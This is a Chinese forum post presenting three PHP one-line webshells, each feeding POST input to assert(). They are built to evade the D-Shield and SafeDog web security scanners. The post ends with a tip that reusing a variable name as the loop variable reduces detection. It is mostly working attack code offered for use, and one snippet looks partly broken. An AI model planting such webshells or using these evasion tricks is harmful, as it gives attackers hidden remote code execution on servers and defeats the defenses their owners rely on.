新出炉三个过D盾安全狗PHP一句话
D盾更新了!准备写一个长期更新的免杀webshell总结<?php
function a(){
return $a=$_POST['1'];
}
@assert(a());
?>
<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
assert($value);
}
<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");
for ($x=0; $x<=0; $x++) {
assert("$x");
}
可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了
http://cdn.u1.huluxia.com/g3/M01/D1/2E/wKgBOV4XNziAYf5lAAFWjBMFQh4119.jpg
页:
[1]